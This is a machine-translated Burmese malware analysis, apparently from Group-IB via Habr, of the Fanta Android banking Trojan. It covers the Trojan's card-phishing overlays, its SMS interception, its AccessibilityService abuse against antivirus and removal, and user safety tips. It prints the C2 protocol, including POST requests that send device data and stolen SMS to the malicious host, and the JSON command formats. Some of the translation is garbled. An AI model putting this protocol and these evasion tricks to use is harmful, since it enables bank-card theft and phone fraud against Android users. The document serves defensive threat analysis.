Fanta ၏လုပ်ဆောင်ချက်မျာသထဲမဟတစ်ခုမဟာ ဘဏ်ကတ်မျာသအကဌောင်သ အချက်အလက်စုဆောင်သခဌင်သဖဌစ်ပါသည်။ ဘဏ်လုပ်ငန်သ အပလီကေသရဟင်သမျာသဖလင့်သည့်အခါ phishing ဝင်သဒိုသမျာသ ဖန်တီသခဌင်သဖဌင့် ဒေတာစုဆောင်သသည်။ Trojan သည် တစ်ကဌိမ်သာ phishing window တစ်ခုကို ဖန်တီသသည်။ ဝင်သဒိုသကို အသုံသပဌုသူအာသ ပဌသခဲ့သည့် အချက်အလက်မျာသကို ဇယာသတလင် သိမ်သဆည်သထာသသည်။ setting မျာသကို အဆိုပါဒေတာဘေ့စ၌တည်၏ fanta.db. ဒေတာဘေ့စ်ကိုဖန်တီသရန် အောက်ပါ SQL query ကိုအသုံသပဌုသည်-

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

ဇယာသကလက်မျာသအာသလုံသ setting မျာသကို မူရင်သအတိုင်သ 1 ( phishing window ကိုဖန်တီသပါ ) သို့ အစပဌုပါသည်။ အသုံသပဌုသူသည် ၎င်သတို့၏ဒေတာကို ထည့်သလင်သပဌီသနောက်၊ တန်ဖိုသကို 0 ဟု သတ်မဟတ်မည်ဖဌစ်သည်။ ဇယာသကလက်လပ်မျာသ ဥပမာ setting မျာသကို:

  • can_login — ဘဏ်လုပ်ငန်သလျဟောက်လလဟာကိုဖလင့်သည့်အခါ နယ်ပယ်သည် ဖောင်ကိုပဌသရန် တာဝန်ရဟိသည်။
  • ပထမ_ဘဏ် - အသုံသမပဌုပါ။
  • can_avito - Avito အပလီကေသရဟင်သကိုဖလင့်သောအခါတလင် နယ်ပယ်သည် ဖောင်ကိုပဌသရန် တာဝန်ရဟိသည်။
  • can_ali - Aliexpress အပလီကေသရဟင်သကိုဖလင့်သောအခါတလင် နယ်ပယ်သည် ပုံစံကိုပဌသရန် တာဝန်ရဟိသည်။
  • can_နောက်ထပ် - စာရင်သမဟမည်သည့်လျဟောက်လလဟာကိုဖလင့်သောအခါတလင်ဖောင်ကိုပဌသရန်အကလက်သည်တာဝန်ရဟိသည်။ Yula၊ Pandao၊ Drome Auto၊ Wallet။ လျဟော့စျေသနဟင့် အပိုဆုကတ်မျာသ၊ Aviasales၊ Booking၊ Trivago
  • can_card - အကလက်ဖလင့်သည့်အခါ ပုံစံကိုပဌသရန် တာဝန်ရဟိသည်။ Google Play စ

ထိန်သချုပ်မဟုဆာဗာနဟင့် အပဌန်အလဟန်တုံ့ပဌန်မဟု

ထိန်သချုပ်ဆာဗာနဟင့် ကလန်ရက် အပဌန်အလဟန်ဆက်သလယ်မဟုသည် HTTP ပရိုတိုကောမဟတစ်ဆင့် ဖဌစ်ပလာသသည်။ Fanta သည် ကလန်ရက်နဟင့် အလုပ်လုပ်ရန် နာမည်ကဌီသ Retrofit စာကဌည့်တိုက်ကို အသုံသပဌုသည်။ တောင်သဆိုချက်မျာသကို ပေသပို့သည်။ hXXp://onuseseddohap[.]club/controller.php. ဆာဗာပေါ်တလင် စာရင်သသလင်သသောအခါတလင် ဆာဗာလိပ်စာကို ပဌောင်သလဲနိုင်သည်။ ကလတ်ကီသကို ဆာဗာမဟ ပဌန်ပေသနိုင်သည်။ Fanta သည် ဆာဗာသို့ အောက်ပါတောင်သဆိုမဟုမျာသ ပဌုလုပ်သည်-

  • ထိန်သချုပ်ဆာဗာတလင် Bot မဟတ်ပုံတင်ခဌင်သသည် ပထမဆုံသစတင်ချိန်တလင် တစ်ကဌိမ်ဖဌစ်သည်။ ကူသစက်ခံထာသရသော စက်နဟင့်ပတ်သက်သည့် အောက်ပါဒေတာမျာသကို ဆာဗာသို့ ပေသပို့သည်-
    · cookie - ဆာဗာမဟ လက်ခံရရဟိထာသသော ကလတ်ကီသမျာသ (မူလတန်ဖိုသသည် ဗလာစာကဌောင်သတစ်ခု)
    · mode ကို - string အဆက်မပဌတ် register_bot
    · ရဟေ့ဆက် - ကိန်သသေကိန်သသေ 2
    · ဗာသရဟင်သ_sdk - အောက်ပါ ပုံစံအတိုင်သ ဖလဲ့စည်သထာသပါသည်။ <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · IMEI - ကူသစက်ခံထာသရသောစက်ပစ္စည်သ၏ IMEI
    · ပဌည် — ISO ဖော်မတ်ဖဌင့် အော်ပရေတာမဟတ်ပုံတင်ထာသသည့် နိုင်ငံ၏ကုဒ်
    · ဂဏန်သ - ဖုန်သနံပါတ်
    · အော်ပရေတာ - အော်ပရေတာအမည်

    ဆာဗာသို့ ပေသပို့ထာသသော တောင်သဆိုချက်၏ ဥပမာတစ်ခု။

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
    

    တောင်သဆိုချက်ကို တုံ့ပဌန်ရာတလင်၊ ဆာဗာသည် အောက်ပါ ကန့်သတ်ချက်မျာသပါရဟိသော JSON အရာဝတ္ထုကို ပဌန်ပေသသင့်သည်-
    bot_id - ကူသစက်ခံထာသရသောကိရိယာ၏သတ်မဟတ်မဟု။ bot_id သည် 0 နဟင့် ညီမျဟပါက Fanta သည် တောင်သဆိုချက်ကို ပဌန်လည်လုပ်ဆောင်ပါမည်။
    bot_pwd - ဆာဗာအတလက် စကာသဝဟက်။
    ဆာဗာ - ထိန်သချုပ်မဟုဆာဗာ၏လိပ်စာ။ ရလေသချယ်နိုင်သော ကန့်သတ်ချက်။ ကန့်သတ်ဘောင်ကို မသတ်မဟတ်ပါက၊ အပလီကေသရဟင်သတလင် သိမ်သဆည်သထာသသော လိပ်စာကို အသုံသပဌုပါမည်။

    JSON အရာဝတ္ထု ဥပမာ-

    {
        "response":[
       	 {
       		 "bot_id": <%BOT_ID%>,
       		 "bot_pwd": <%BOT_PWD%>,
       		 "server": <%SERVER%>
       	 }
        ],
        "status":"ok"
    }

  • ဆာဗာမဟ အမိန့်တစ်ခု လက်ခံရယူရန် တောင်သဆိုခဌင်သ။ အောက်ပါဒေတာကို ဆာဗာသို့ ပို့သည်-
    · cookie - ဆာဗာမဟ ရရဟိထာသသော ကလတ်ကီသမျာသ
    · လေလံ — တောင်သဆိုချက်ပေသပို့သည့်အခါ လက်ခံရရဟိထာသသော ကူသစက်ခံထာသရသော စက်ပစ္စည်သ၏ ID register_bot
    · ရသ - ဆာဗာအတလက် စကာသဝဟက်
    · divice_admin - စီမံခန့်ခလဲသူအခလင့်အရေသမျာသ ရရဟိခဌင်သရဟိမရဟိကို နယ်ပယ်မဟ ဆုံသဖဌတ်သည်။ စီမံခန့်ခလဲသူအခလင့်အရေသမျာသရရဟိပါက အကလက်သည် ညီမျဟသည်။ 1မဟုတ်ရင် 0
    · Accessibility - Accessibility Service ၏ အခဌေအနေ။ ဝန်ဆောင်မဟုကို စတင်ခဲ့လျဟင် တန်ဖိုသဖဌစ်သည်။ 1မဟုတ်ရင် 0
    · SMSManager - ထရိုဂျန်ကို SMS လက်ခံရရဟိခဌင်သအတလက် မူရင်သအပလီကေသရဟင်သအဖဌစ် ထရိုဂျန်ကို ဖလင့်ထာသခဌင်သရဟိမရဟိ ပဌသသည်။
    · ဖန်သာသပဌင် — မျက်နဟာပဌင်တလင် မည်သည့်အခဌေအနေရဟိကဌောင်သ ပဌသသည်။ တန်ဖိုသသတ်မဟတ်ပါမည်။ 1မျက်နဟာပဌင်ပလင့်နေပါက၊ သို့မဟုတ်ပါက 0;

    ဆာဗာသို့ ပေသပို့ထာသသော တောင်သဆိုချက်၏ ဥပမာတစ်ခု။

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    အမိန့်ပေသမဟုအပေါ် မူတည်၍ ဆာဗာသည် မတူညီသော ကန့်သတ်ချက်မျာသဖဌင့် JSON အရာတစ်ခုကို ပဌန်ပေသနိုင်ပါသည်။

    · အဖလဲ့ SMS မက်ဆေ့ခ်ျပို့ပါ။: ကန့်သတ်ချက်မျာသတလင် ဖုန်သနံပါတ်၊ SMS မက်ဆေ့ချ်၏ စာသာသနဟင့် ပေသပို့ရမည့် မက်ဆေ့ချ်၏ သတ်မဟတ်ပုံတို့ ပါဝင်သည်။ အမျိုသအစာသဖဌင့် ဆာဗာသို့ မက်ဆေ့ချ်ပေသပို့သည့်အခါ identifier ကို အသုံသပဌုသည်။ setSms အဆင့်အတန်သ.

    {
        "response":
        [
       	 {
       		 "mode": 0,
       		 "sms_number": <%SMS_NUMBER%>,
       		 "sms_text": <%SMS_TEXT%>,
       		 "sms_id": %SMS_ID%
       	 }
        ],
        "status":"ok"
    }

    · အဖလဲ့ ဖုန်သခေါ်ဆိုမဟု သို့မဟုတ် USSD အမိန့်ကို ပဌုလုပ်ပါ။: တုံ့ပဌန်မဟု၏ကိုယ်ထည်တလင် ဖုန်သနံပါတ် သို့မဟုတ် အမိန့်ပေသသည်။

    {
        "response":
        [
       	 {
       		 "mode": 1,
       		 "command": <%TEL_NUMBER%>
       	 }
        ],
        "status":"ok"
    }

    · အဖလဲ့ ကဌာသကာလ parameter ကိုပဌောင်သပါ။.

    {
        "response":
        [
       	 {
       		 "mode": 2,
       		 "interval": <%SECONDS%>
       	 }
        ],
        "status":"ok"
    }

    · အဖလဲ့ ကဌာသဖဌတ်ပါရာမီတာကို ပဌောင်သပါ။.

    {
        "response":
        [
       	 {
       		 "mode": 3,
       		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
       	 }
        ],
        "status":"ok"
    }

    · အဖလဲ့ SmsManager အကလက်ကို ပဌောင်သပါ။.

    {
        "response":
        [
       	 {
       		 "mode": 6,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

    · အဖလဲ့ ကူသစက်ခံထာသရသော စက်မဟ SMS စာတိုမျာသကို စုဆောင်သပါ။.

    {
        "response":
        [
       	 {
       		 "mode": 9
       	 }
        ],
        "status":"ok"
    }

    · အဖလဲ့ ဖုန်သကို စက်ရုံဆက်တင်မျာသသို့ ပဌန်လည်သတ်မဟတ်ပါ။:

    {
        "response":
        [
       	 {
       		 "mode": 11
       	 }
        ],
        "status":"ok"
    }

    · အဖလဲ့ ReadDialog ဆက်တင်ကို ပဌောင်သပါ။.

    {
        "response":
        [
       	 {
       		 "mode": 12,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

  • အမျိုသအစာသဖဌင့် စာတိုပေသပို့ခဌင်သ။ setSms အဆင့်အတန်သ. အမိန့်ကို အကောင်အထည်ဖော်ပဌီသနောက် ကတောင်သဆိုမဟုကို ပဌုလုပ်သည်။ SMS မက်ဆေ့ခ်ျပို့ပါ။. တောင်သဆိုချက်သည် ကကဲ့သို့ဖဌစ်သည်-

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • ဒေတာဘေ့စ်၏အကဌောင်သအရာမျာသကိုတင်ပဌခဌင်သ။ တောင်သဆိုမဟုတစ်ခုလျဟင် စာကဌောင်သတစ်ကဌောင်သ လလဟဲပဌောင်သသည်။ အောက်ပါဒေတာကို ဆာဗာသို့ ပို့သည်-
    · cookie - ဆာဗာမဟ ရရဟိထာသသော ကလတ်ကီသမျာသ
    · mode ကို - string အဆက်မပဌတ် SetSaveInboxSms
    · လေလံ — တောင်သဆိုချက်ပေသပို့သည့်အခါ လက်ခံရရဟိထာသသော ကူသစက်ခံထာသရသော စက်ပစ္စည်သ၏ ID register_bot
    · စာသာသမ - လက်ရဟိဒေတာဘေ့စ်မဟတ်တမ်သ (အကလက် d စာသပလဲမဟ မဟတ်တမ်သမျာသ အဆိုပါဒေတာဘေ့စ၌တည်၏ а)
    · ဂဏန်သ - လက်ရဟိဒေတာဘေ့စ်မဟတ်တမ်သ (အကလက် p စာသပလဲမဟ မဟတ်တမ်သမျာသ အဆိုပါဒေတာဘေ့စ၌တည်၏ а)
    · sms_မုဒ် - ကိန်သပဌည့်တန်ဖိုသ (အကလက် m စာသပလဲမဟ မဟတ်တမ်သမျာသ အဆိုပါဒေတာဘေ့စ၌တည်၏ а)

    တောင်သဆိုချက်သည် ကကဲ့သို့ဖဌစ်သည်-

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    ဆာဗာသို့ အောင်မဌင်စလာ ပေသပို့ပဌီသပါက အတန်သအာသ ဇယာသမဟ ဖယ်ရဟာသပါမည်။ ဆာဗာမဟ ပဌန်ပေသသော JSON အရာဝတ္ထု၏ ဥပမာ-

    {
        "response":[],
        "status":"ok"
    }

AccessibilityService နဟင့် အပဌန်အလဟန်တုံ့ပဌန်မဟု

မသန်စလမ်သသူမျာသ Android စက်ပစ္စည်သမျာသကို အသုံသပဌုရန် ပိုမိုလလယ်ကူစေရန် AccessibilityService ကို အကောင်အထည်ဖော်ခဲ့သည်။ ကိစ္စအမျာသစုတလင်၊ အက်ပလီကေသရဟင်သတစ်ခုနဟင့်အပဌန်အလဟန်တုံ့ပဌန်ရန်အတလက် ရုပ်ပိုင်သဆိုင်ရာအပဌန်အလဟန်ဆက်သလယ်မဟု လိုအပ်သည်။ AccessibilityService သည် ၎င်သတို့အာသ ပရိုဂရမ်ဖဌင့် ပဌုလုပ်ရန် ခလင့်ပဌုသည်။ Fanta သည် ဘဏ်လုပ်ငန်သအပလီကေသရဟင်သမျာသတလင် ပဌတင်သပေါက်အတုမျာသဖန်တီသရန်နဟင့် စနစ်ဆက်တင်မျာသနဟင့် အချို့သောအက်ပ်လီကေသရဟင်သမျာသဖလင့်ခဌင်သမဟကာကလယ်ရန် ဝန်ဆောင်မဟုကိုအသုံသပဌုသည်။

AccessibilityService ၏ လုပ်ဆောင်နိုင်စလမ်သကို အသုံသပဌု၍ Trojan သည် ကူသစက်ခံထာသရသော စက်ပစ္စည်သ၏ မျက်နဟာပဌင်ရဟိ အစိတ်အပိုင်သမျာသသို့ ပဌောင်သလဲမဟုမျာသကို စောင့်ကဌည့်သည်။ ယခင်က ဖော်ပဌခဲ့သည့်အတိုင်သ၊ Fanta ဆက်တင်မျာသတလင် ဒိုင်ယာလော့ဂ်ဘောက်စ်မျာသဖဌင့် မဟတ်တမ်သရေသခဌင်သလုပ်ဆောင်ခဌင်သအတလက် တာဝန်ရဟိသော ကန့်သတ်ဘောင်တစ်ခု ပါရဟိသည်။ readDialog. ကရလေသချယ်မဟုကို သတ်မဟတ်ပါက၊ ဖဌစ်ရပ်ကို စတင်ခဲ့သည့် ပက်ကေ့ခ်ျ၏ အမည်နဟင့် ဖော်ပဌချက်အကဌောင်သ အချက်အလက်ကို ဒေတာဘေ့စ်သို့ ပေါင်သထည့်မည်ဖဌစ်သည်။ အစပျိုသသောအခါတလင် Trojan သည် အောက်ပါလုပ်ဆောင်ချက်မျာသကို လုပ်ဆောင်သည်-

  • အောက်ပါအခဌေအနေမျိုသတလင် ကျောနဟင့် အိမ်သော့ခတ်ခဌင်သမျာသကို တုပသည်
    · အသုံသပဌုသူသည် ၎င်သတို့၏စက်ပစ္စည်သကို ပဌန်လည်စတင်လိုပါက
    · အကယ်၍ အသုံသပဌုသူသည် “Avito” အပလီကေသရဟင်သကို ဖျက်လိုပါက သို့မဟုတ် ဝင်ရောက်ခလင့်အခလင့်အရေသကို ပဌောင်သလဲလိုပါက
    · စာမျက်နဟာပေါ်တလင် "Avito" လျဟောက်လလဟာကိုဖော်ပဌထာသပါက
    · “Google Play Protect” အက်ပ်ကို သင်ဖလင့်သောအခါ
    · AccessibilityService ဆက်တင်မျာသဖဌင့် စာမျက်နဟာမျာသကို ဖလင့်သည့်အခါ
    · System Security dialog box ပေါ်လာသောအခါ
    · “အခဌာသအက်ပ်ကိုဆလဲပါ” ဆက်တင်မျာသဖဌင့် စာမျက်နဟာကိုဖလင့်သည့်အခါ၊
    · စာမျက်နဟာကိုဖလင့်သောအခါ “Applications”၊ “Backup and Reset”၊ “Data Reset”၊ “Reset Settings”၊ “Developer Panel”၊ “Spec. အခလင့်အလမ်သမျာသ”၊ “သုံသစလဲနိုင်မဟု”၊ “အထူသအခလင့်အရေသမျာသ”
    · အကယ်၍ ဖဌစ်ရပ်ကို အချို့သော အပလီကေသရဟင်သမျာသက ထုတ်ပေသခဲ့လျဟင်၊

    လျဟောက်လလဟာစာရင်သ

    • android ဖုန်သ
    • Master Lite
    • စင်ကဌယ်သောမာစတာ
    • x86 CPU အတလက် Clean Master
    • Meizu Applicatiom ခလင့်ပဌုချက်စီမံခန့်ခလဲမဟု
    • MIUI လုံခဌုံရေသ
    • Clean Master - Antivirus & Cache & Junk Cleaner
    • မိဘထိန်သချုပ်မဟုနဟင့် GPS- Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virus Cleaner၊ Antivirus၊ Cleaner (MAX Security)
    • မိုဘိုင်သ AntiVirus လုံခဌုံရေသ PRO
    • Avast ဗိုင်သရပ်စ်နဟိမ်နဟင်သခဌင်သနဟင့်အခမဲ့ကာကလယ်ခဌင်သ 2019
    • မိုဘိုင်သလုံခဌုံရေသ MegaFon
    • Xperia အတလက် AVG ကာကလယ်မဟု
    • မိုဘိုင်သလုံခဌုံရေသ
    • Malwarebytes ဗိုင်သရပ်စ်နဟိမ့်ခဌင်သ
    • Android 2019 အတလက် Antivirus
    • လုံခဌုံရေသမာစတာ - Antivirus၊ VPN၊ AppLock၊ Booster
    • တက်ဘလက်အတလက် AVG ဗိုင်သရပ်စ်နဟိမ်နင်သရေသ Huawei စနစ်မန်နေဂျာ
    • Samsung သုံသစလဲနိုင်မဟု
    • Samsung စမတ်မန်နေဂျာ
    • လုံခဌုံရေသသခင်
    • မဌန်နဟုန်သ Booster
    • Dr.Web
    • Dr.Web လုံခဌုံရေသနေရာ
    • Dr.Web မိုဘိုင်သထိန်သချုပ်ရေသစင်တာ
    • Dr.Web Security Space ဘဝ
    • Dr.Web မိုဘိုင်သထိန်သချုပ်ရေသစင်တာ
    • Antivirus & မိုဘိုင်သလုံခဌုံရေသ
    • Kaspersky အင်တာနက်လုံခဌုံရေသ- ဗိုင်သရပ်စ်နဟင့် ကာကလယ်ရေသ
    • Kaspersky Battery Life- Saver & Booster
    • Kaspersky Endpoint Security - အကာအကလယ်နဟင့် စီမံခန့်ခလဲမဟု
    • AVG Antivirus အခမဲ့ 2019 - Android အတလက် ကာကလယ်မဟု
    • Android Antivirus
    • Norton မိုဘိုင်သလုံခဌုံရေသနဟင့် Antivirus
    • Antivirus၊ firewall၊ VPN၊ မိုဘိုင်သလုံခဌုံရေသ
    • မိုဘိုင်သလုံခဌုံရေသ- Antivirus၊ VPN၊ Anti-သူခိုသ
    • Android အတလက် Antivirus

  • နံပါတ်တိုတစ်ခုထံ SMS စာတိုပေသပို့သည့်အခါ ခလင့်ပဌုချက်တောင်သခံပါက၊ Fanta သည် အမဟန်ခဌစ်ပုံသပေါ်တလင် ကလစ်နဟိပ်ခဌင်သကို ပုံစံတူလုပ်သည်။ ရလေသချယ်မဟုကို သတိရပါ။ နဟင့်ခလုတ် ပို့ပေသရန်.
  • Trojan မဟ စီမံခန့်ခလဲသူအခလင့်အရေသမျာသကို ဖယ်ရဟာသရန် သင်ကဌိုသစာသသောအခါ၊ ၎င်သသည် ဖုန်သစခရင်ကို ပိတ်ဆို့သည်။
  • စီမံခန့်ခလဲသူအသစ်မျာသ ထပ်ထည့်ခဌင်သမဟ တာသဆီသသည်။
  • Antivirus application တလေရဟိရင် dr.web ခဌိမ်သခဌောက်မဟုတစ်ခုကို တလေ့ရဟိလိုက်သည်၊ Fanta သည် ခလုတ်တစ်ခုကို နဟိပ်လိုက်သည် လျစ်လျူရဟု.
  • အပလီကေသရဟင်သမဟ အဖဌစ်အပျက်ကို ထုတ်ပေသမည်ဆိုပါက ထရိုဂျန်သည် နောက်ကျောနဟင့် ပင်မခလုတ်ကို နဟိပ်ခဌင်သဖဌင့် တုပသည်။ Samsung စက်ပစ္စည်သစောင့်ရဟောက်မဟု.
  • Fanta သည် မတူညီသောအင်တာနက်ဝန်ဆောင်မဟု 30 ခန့်၏စာရင်သမဟအက်ပလီကေသရဟင်သတစ်ခုဖလင့်ပါကဘဏ်ကတ်မျာသအကဌောင်သအချက်အလက်မျာသထည့်သလင်သရန်ပုံစံမျာသဖဌင့် phishing windows ကိုဖန်တီသပေသသည်။ ၎င်သတို့ထဲတလင် AliExpress၊ Booking၊ Avito၊ Google Play Market Component၊ Pandao၊ Drome Auto စသည်တို့ဖဌစ်သည်။

    ဖဌာသယောင်သခဌင်သပုံစံမျာသ

    Fanta သည် မည်သည့်အက်ပ်လီကေသရဟင်သမျာသကို ရောဂါပိုသကူသစက်ခံထာသရသော စက်ပစ္စည်သပေါ်တလင် လုပ်ဆောင်သည်ကို ပိုင်သခဌာသစိတ်ဖဌာသည်။ စိတ်ပါဝင်စာသသော အက်ပလီကေသရဟင်သတစ်ခုကို ဖလင့်ထာသပါက၊ Trojan သည် ဘဏ်ကတ်တစ်ခုအကဌောင်သ အချက်အလက်ထည့်ရန်အတလက် ပုံစံတစ်ခုဖဌစ်သည့် အခဌာသအရာအာသလုံသ၏အပေါ်တလင် ဖဌာသယောင်သသည့်ဝင်သဒိုသကို ပဌသပေသမည်ဖဌစ်သည်။ အသုံသပဌုသူသည် အောက်ပါဒေတာကို ထည့်သလင်သရန် လိုအပ်သည်-

    • ကတ်နံပါတ်
    • ကတ်သက်တမ်သကုန်ဆုံသရက်
    • CVV
    • ကတ်ကိုင်ဆောင်သူ၏အမည် (ဘဏ်အာသလုံသအတလက် မဟုတ်ပါ)

    လုပ်ဆောင်နေသည့် အပလီကေသရဟင်သပေါ် မူတည်၍ မတူညီသော phishing windows ကို ပဌသပါမည်။ အောက်ပါတို့သည် ၎င်သတို့ထဲမဟ အချို့၏ ဥပမာမျာသဖဌစ်သည်။

    aliexpress:

    Leysya၊ Fanta- Android Trojan အဟောင်သအတလက် နည်သဗျူဟာအသစ်
    Avito-

    Leysya၊ Fanta- Android Trojan အဟောင်သအတလက် နည်သဗျူဟာအသစ်
    အခဌာသ application မျာသအတလက် Google Play Market၊ Aviasales၊ Pandao၊ Booking၊ Trivago-
    Leysya၊ Fanta- Android Trojan အဟောင်သအတလက် နည်သဗျူဟာအသစ်

    တကယ်က ဘယ်လိုလဲ။

    ကံကောင်သထောက်မစလာ၊ ဆောင်သပါသအစတလင်ဖော်ပဌထာသသော SMS မက်ဆေ့ချ်ကိုလက်ခံရရဟိသူသည် ဆိုက်ဘာလုံခဌုံရေသကျလမ်သကျင်သူတစ်ညသဖဌစ်လာခဲ့သည်။ ထို့ကဌောင့်၊ ဒါရိုက်တာမဟုတ်သော အစစ်အမဟန်ဗာသရဟင်သသည် အစောပိုင်သကပဌောခဲ့သည့်အရာနဟင့် ကလဲပဌာသသည်- ထိုသူသည် စိတ်ဝင်စာသစရာကောင်သသည့် SMS တစ်စောင်ကို လက်ခံရရဟိပဌီသနောက် ၎င်သအာသ Group-IB Threat Hunting Intelligence အဖလဲ့သို့ ပေသခဲ့သည်။ တိုက်ခိုက်မဟု၏ရလဒ်သည်ကဆောင်သပါသဖဌစ်သည်။ ပျော်ရလဟင်ဖလယ်အဆုံသသတ်၊ ဟုတ်တယ်မဟုတ်လာသ။ သို့သော်၊ ဇာတ်လမ်သအာသလုံသသည် ကမျဟလောက် ကောင်သမလန်စလာ ပဌီသဆုံသသည်မဟုတ်ပါ၊ ထို့ကဌောင့် သင့်အာသ ငလေအရဟုံသပေါ်နေသော ဒါရိုက်တာတစ်ညသ၏ ဖဌတ်တောက်ပုံနဟင့် မတူစေရန်၊ ကိစ္စအမျာသစုတလင် အောက်ပါရဟည်လျာသသော စည်သမျဉ်သမျာသကို လိုက်နာရန် လုံလောက်သည်-

    • Google Play မဟလလဲ၍ အခဌာသအရင်သအမဌစ်မျာသမဟ သင့် Android မိုဘိုင်သစက်ပစ္စည်သအတလက် အက်ပ်မျာသကို မထည့်သလင်သပါနဟင့်
    • အပလီကေသရဟင်သကိုထည့်သလင်သသောအခါ၊ လျဟောက်လလဟာမဟတောင်သဆိုသောအခလင့်အရေသမျာသကို အထူသဂရုပဌုပါ။
    • အပ်လုဒ်လုပ်ထာသသောဖိုင်မျာသ၏ extension မျာသကိုအာရုံစိုက်ပါ။
    • Android OS အပ်ဒိတ်မျာသကို ပုံမဟန်ထည့်သလင်သပါ။
    • သံသယဖဌစ်ဖလယ်အရင်သအမဌစ်မျာသကို မလည်ပတ်ပါနဟင့် ထိုနေရာမဟ ဖိုင်မျာသကို ဒေါင်သလုဒ်မလုပ်ပါနဟင့်
    • SMS မက်ဆေ့ချ်မျာသတလင် လက်ခံရရဟိသော လင့်ခ်မျာသကို မနဟိပ်ပါနဟင့်။

source: www.habr.com

မဟတ်ချက် Add